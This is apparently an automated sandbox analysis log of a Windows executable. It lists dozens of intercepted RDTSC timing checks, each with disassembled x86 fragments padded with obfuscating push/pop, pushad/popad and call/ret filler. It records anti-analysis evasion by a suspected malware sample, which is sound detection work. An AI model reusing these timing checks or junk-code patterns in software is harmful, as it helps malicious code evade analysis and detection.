                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A403E8 second address: A4048F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jnp 00007F0B08CB6D20h 0x0000000e jmp 00007F0B08CB6D1Ah 0x00000013 nop 0x00000014 add dword ptr [ebp+122D32A7h], ebx 0x0000001a push dword ptr fs:[00000000h] 0x00000021 jmp 00007F0B08CB6D25h 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F0B08CB6D18h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 mov eax, dword ptr [ebp+122D0B09h] 0x0000004d mov dword ptr [ebp+122D32A7h], edx 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push edx 0x00000058 call 00007F0B08CB6D18h 0x0000005d pop edx 0x0000005e mov dword ptr [esp+04h], edx 0x00000062 add dword ptr [esp+04h], 00000019h 0x0000006a inc edx 0x0000006b push edx 0x0000006c ret 0x0000006d pop edx 0x0000006e ret 0x0000006f add dword ptr [ebp+122D1E26h], eax 0x00000075 push ecx 0x00000076 mov dword ptr [ebp+122D20DCh], eax 0x0000007c pop edi 0x0000007d push eax 0x0000007e push eax 0x0000007f push edx 0x00000080 push esi 0x00000081 jnc 00007F0B08CB6D16h 0x00000087 pop esi 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4048F second address: A40494 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44340 second address: A443C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov edi, dword ptr [ebp+122D336Bh] 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F0B08CB6D18h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov bh, dl 0x0000002a movsx edi, bx 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007F0B08CB6D18h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 add dword ptr [ebp+122D1E26h], eax 0x0000004f jnl 00007F0B08CB6D25h 0x00000055 jmp 00007F0B08CB6D1Fh 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F0B08CB6D20h 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A43414 second address: A434CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push edx 0x00000009 call 00007F0B09070BC8h 0x0000000e pop edx 0x0000000f mov dword ptr [esp+04h], edx 0x00000013 add dword ptr [esp+04h], 00000017h 0x0000001b inc edx 0x0000001c push edx 0x0000001d ret 0x0000001e pop edx 0x0000001f ret 0x00000020 push edi 0x00000021 jnl 00007F0B09070BCCh 0x00000027 pop edi 0x00000028 ja 00007F0B09070BCFh 0x0000002e push dword ptr fs:[00000000h] 0x00000035 or dword ptr [ebp+122D1E2Ah], ebx 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 jmp 00007F0B09070BD5h 0x00000047 call 00007F0B09070BCDh 0x0000004c jmp 00007F0B09070BD1h 0x00000051 pop ebx 0x00000052 mov eax, dword ptr [ebp+122D0F3Dh] 0x00000058 jmp 00007F0B09070BCBh 0x0000005d mov edi, dword ptr [ebp+122D348Eh] 0x00000063 push FFFFFFFFh 0x00000065 or bh, 0000006Bh 0x00000068 mov bl, ch 0x0000006a nop 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007F0B09070BCCh 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41429 second address: A41432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A434CB second address: A434D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4674B second address: A46755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0B08CB6D16h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49685 second address: A496BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0B09070BD4h 0x00000011 jmp 00007F0B09070BD7h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49C5B second address: A49CEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F0B08CB6D18h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 or dword ptr [ebp+122D38AAh], edx 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F0B08CB6D18h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 add dword ptr [ebp+122D209Dh], ecx 0x0000004d push 00000000h 0x0000004f jmp 00007F0B08CB6D26h 0x00000054 mov dword ptr [ebp+1244E1ACh], ebx 0x0000005a xchg eax, esi 0x0000005b jnl 00007F0B08CB6D33h 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F0B08CB6D21h 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49CEB second address: A49CFC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0B09070BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49F1C second address: A49F21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49F21 second address: A49F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51C87 second address: A51C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E9498 second address: 9E94C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B09070BD4h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F0B09070BD0h 0x00000010 popad 0x00000011 push ecx 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51479 second address: A5147D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5147D second address: A51488 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51488 second address: A51492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51492 second address: A514BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B09070BCEh 0x00000009 jmp 00007F0B09070BD0h 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A514BA second address: A514C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jne 00007F0B08CB6D16h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A514C8 second address: A514D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F0B09070BC6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A514D7 second address: A514DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A514DB second address: A51508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B09070BD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0B09070BD1h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5592D second address: A55937 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0B08CB6D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A55937 second address: A55941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F0B09070BC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EE608 second address: 9EE60C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EE60C second address: 9EE62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F0B09070BD2h 0x0000000e pop esi 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EE62E second address: 9EE632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B566 second address: A5B56A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B56A second address: A5B56E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B56E second address: A5B579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B6C8 second address: A5B6DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B08CB6D1Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B6DA second address: A5B700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0B09070BD8h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B700 second address: A5B706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B706 second address: A5B710 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0B09070BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60031 second address: A6004B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F0B08CB6D1Ch 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6004B second address: A60056 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007F0B09070BC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60056 second address: A6005E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BE41 second address: A2BE47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BE47 second address: A2BE4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BE4B second address: A2BE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor edx, dword ptr [ebp+122D2CECh] 0x00000011 lea eax, dword ptr [ebp+1247DBF5h] 0x00000017 jmp 00007F0B09070BD9h 0x0000001c mov ecx, dword ptr [ebp+122D2A1Ch] 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 jl 00007F0B09070BCCh 0x0000002b jno 00007F0B09070BC6h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C8C8 second address: A2C8F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F0B08CB6D1Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push ecx 0x0000000f mov ecx, eax 0x00000011 pop ecx 0x00000012 push 00000004h 0x00000014 mov dx, di 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0B08CB6D1Ah 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C8C4 second address: A2C8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2CDEB second address: A2CDF5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0B08CB6D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D180 second address: A2D186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D186 second address: A2D18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F212 second address: A5F22B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0B09070BD3h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F22B second address: A5F230 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F230 second address: A5F250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F0B09070BD1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F250 second address: A5F25A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0B08CB6D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F647 second address: A5F6A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F0B09070BD0h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F0B09070BCDh 0x00000012 jmp 00007F0B09070BD2h 0x00000017 js 00007F0B09070BC6h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F0B09070BD9h 0x00000028 pop ebx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F824 second address: A5F830 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F830 second address: A5F836 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A659CF second address: A659D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A659D3 second address: A659D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A659D9 second address: A659E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A659E2 second address: A65A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 pushad 0x00000008 jmp 00007F0B09070BD4h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A65A02 second address: A65A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 jmp 00007F0B08CB6D24h 0x0000000e jnc 00007F0B08CB6D16h 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0B08CB6D1Ah 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A65A32 second address: A65A43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0B09070BCBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A65A43 second address: A65A4D instructions: 0x00000000 rdtsc 0x00000002 je 00007F0B08CB6D1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A65A4D second address: A65A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64A14 second address: A64A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64A18 second address: A64A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F0B09070BC6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64CF9 second address: A64D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B08CB6D29h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64E8E second address: A64E94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64E94 second address: A64EA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007F0B08CB6D16h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6502A second address: A6504C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B09070BD9h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6504C second address: A65050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A65050 second address: A6506B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0B09070BD2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6518C second address: A6519E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jl 00007F0B08CB6D18h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6543B second address: A65440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A65440 second address: A65447 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A674C3 second address: A674C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6B980 second address: A6B984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6B984 second address: A6B988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6B988 second address: A6B99F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0B08CB6D16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0B08CB6D1Bh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6BD41 second address: A6BD59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B09070BD4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6BD59 second address: A6BD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6BD5F second address: A6BD65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6BD65 second address: A6BD6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0B08CB6D16h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6B4E7 second address: A6B509 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0B09070BC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F0B09070BCEh 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007F0B09070BC6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6B509 second address: A6B52F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push ebx 0x0000000b jmp 00007F0B08CB6D20h 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007F0B08CB6D16h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6B52F second address: A6B538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C16E second address: A6C172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C3EE second address: A6C3F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
